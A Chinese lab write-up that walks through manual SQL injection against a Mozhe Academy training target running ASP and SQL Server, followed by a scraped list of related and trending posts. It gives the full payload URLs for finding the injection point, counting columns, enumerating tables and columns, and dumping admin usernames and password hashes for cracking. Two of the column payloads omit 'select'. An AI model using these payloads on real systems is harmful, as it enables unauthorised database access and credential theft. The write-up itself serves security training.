本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Sql Server数据库)。

地址:http://219.153.49.228:42295/new_list.asp?id=2(注意地址已失效仅供参考)

首先第一步,看是否存在注入点。

构造Payload “http://219.153.49.228:42295/new_list.asp?id=2 and 1=2”

http://219.153.49.228:42295/new_list.asp?id=2 and 1=2

回显报错,说明“and 1=2”语句拼接到了后端数据库查询语句当中。

接下来我们就开始猜解后端收据库能够返回多少个字段

使用order by构造Payload “http://219.153.49.228:42295/new_list.asp?id=1 order by 4”

http://219.153.49.228:42295/new_list.asp?id=1 order by 4

Order by是数据库查询的时候对结果进行的排序,如果后面写的是字段,则根据查询字段进行排序,但如果后面写的是数字,该数字大于所查询的字段数,则就会报错,小于的话就不会报错。

发现order by 5的时候没有数据回显,order by 4 有回显数据,所以后端返回到前端的数据字段数为4个。

下面就要开始检测这4个字段当中哪些字段可以被前端显示出来。

使用union 查询来构造Payload “http://219.153.49.228:42295/new_list.asp?id=2 and 1=2 union all select 'null',null,null,null”通过前端页面是否显示null字符来判断第一个字段为回显数据字段。

http://219.153.49.228:42295/new_list.asp?id=2 and 1=2 union all select 'null',null,null,null

通过测试发现只有第二第三个字段是前端回显数据字段。

这样我们就可以在这两个字段当中来查询我们想要的得到的数据。

例如得到当前数据库名称(db_name())和当前用户(user,system_user,current_user),@@SERVERNAME获取服务器主机信息以及数据库的版本(@@version)。

接下来咱们就开始爆表名。

构造payload “http://219.153.49.228:42295/new_list.asp?id=2 and 1=2  union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),null,null”

http://219.153.49.228:42295/new_list.asp?id=2 and 1=2  union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),null,null

其中sysobjects系统对象表,保存当前数据库的对象。Xtype='u' 代表查询表的操作。

如果希望爆出其余的表即可以构造payload “http://219.153.49.228:42295/new_list.asp?id=2 and 1=2  union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null”

直接name not in ('已经爆出的表名')

“http://219.153.49.228:42295/new_list.asp?id=2 and 1=2  union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null

大家还可以在name not in ('已爆出的表名1','已爆出的表名2') 小括号里添加更多已经爆出的表名,这里就不再尝试。

爆出表名就可以继续爆出字段名了 。

构造Payload:“http://219.153.49.228:42295/new_list.asp?id=2 and 1=2 union all null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null”

http://219.153.49.228:42295/new_list.asp?id=2 and 1=2 union all null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null

其中object_id代表要查询字段的表名,数字1为第一列的字段,以次类推,直到查询不到字段名位置。

         这里咱们直接从第二列字段名和第三列字段名知道了字段名有username,password。剩下的就交给小伙伴们自己去尝试吧!

接下来咱们就通过爆出的字段名来查询数据信息。

构造Payload:“http://219.153.49.228:42295/new_list.asp?id=2 and 1=2 union all select null,username,password,null from manage”

http://219.153.49.228:42295/new_list.asp?id=2 and 1=2 union all select null,username,password,null from manage

这样最终我们就可以获得数据了,将密码进行MD5解密(md5在线解密破解,md5解密加密),返回登录页进行登录,划倒页面最下端就可以看到KEY了。

SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))相关推荐

  1. 墨者学院01 SQL手工注入漏洞测试(MySQL数据库)

    问题描述 鉴于我已经两周没能成功运行攻防世界的靶场环境...于是昨天又搜了一些网站,感觉墨者学院的题目还可以~ SQL手工注入虽然是一个已经被安全博主讲烂的主题,但是我之前很少有从头到尾实践手工注入的 ...

  2. Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))

    本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Oracle数据库). 地址:http://124.70.22.208:42948/new_list.php?id=1(注意地址已 ...

  3. MongoDB数据库注入-墨者学院(SQL手工注入漏洞测试(MongoDB数据库))

    本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(MongoDB数据库). 地址:http://124.70.71.251:46804/new_list.php?id=1(注意这里 ...

  4. 墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)

    今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL手工注入漏洞测试(MongoDB数据库). 一.题目简介 我们这里采用墨者学院的MongoDB数据库渗透测试题目,其地址为:https:/ ...

  5. 《墨者学院——SQL手工注入漏洞测试(MySQL数据库)》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 一:思路 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭 ...

  6. 墨者学院SQL手工注入靶场漏洞详解

    墨者学院SQL手工注入靶场漏洞详解 目录 靶场地址 步骤详解 目录 靶场地址 该靶场由墨者学院安全工程师"墨者"所搭建,靶场环境为Nginx+PHP+MySQL,启动靶场只需1墨币 ...

  7. 墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)

    0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入.同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清 ...

  8. SQL手工注入漏洞测试(Oracle数据库)

    SQL手工注入漏洞测试(Oracle数据库) 0x01前言 本文旨在讲述Oracle数据库多种情况下如何进行注入 靶场地址:SQL手工注入漏洞测试(Oracle数据库)_SQL注入_在线靶场_墨者学院 ...

  9. 墨者学院 靶场练习(一) SQL注入

    墨者学院 在线靶场 工具: sqlmap 第一题: SQL手工注入漏洞测试(MySQL数据库-字符型) 利用工具 可以很快速注入,手工注入请看 https://blog.csdn.net/qq_423 ...

最新文章

  1. 好久没写blog了。最近感觉自己老了
  2. [置顶] 自己动手实现OpenGL之glViewPort(一)
  3. linux tomcat 隐藏版本号
  4. 如何玩转跨库Join?跨数据库实例查询应用实践
  5. C# WebApi+Task+WebSocket实战项目演练(四)
  6. 发现qq的mac输入法2.8,在终端全屏下输入不显示待选文字或单词
  7. Effective Java读书笔记六:方法
  8. 软件测试技术——软件测试概述
  9. macOS Big Sur11.2发布候选版更新:修复蓝牙和显示连接问题
  10. GPS 的物理数学原理
  11. 还能这样玩——关于一些OI的黑(sao)科(cao)技(zuo)优化
  12. MySQL讲义第50讲——select 查询之查询练习(八):查询每门课程成绩前三名的学生信息
  13. html中的value属性取值
  14. 『杭电1982』Kaitou Kid - The Phantom Thief (1)
  15. linux 安装软件出现:“E:无法定位软件包”
  16. 学数据结构,是不是一定要先学离散数学
  17. Scratch 相关等级考试
  18. Python进阶-正则表达式
  19. 先验概率和后验概率那点事儿
  20. python破解md5_python怎么使用md5加密解密

热门文章

  1. APP热潮来临 图解九种商业模式
  2. 线性二自由度汽车模型的微分方程
  3. MTTR和MTBF两个指标的简单介绍
  4. 前端笔记之微信小程序(二){{}}插值和MVVM模式数据双向绑定指令API
  5. Null value appeared in non-nullable field java.lang.NullPointerException
  6. 94%的市场待开发,这份调研报告直指企业“软肋”!
  7. 页面相关的数据存储(缓存及Web Storage)
  8. 浅谈EDM对B2C网站的七大作用
  9. 摩拜服务器维护,摩拜单车云服务器
  10. Leetcode——537. Complex Number Multiplication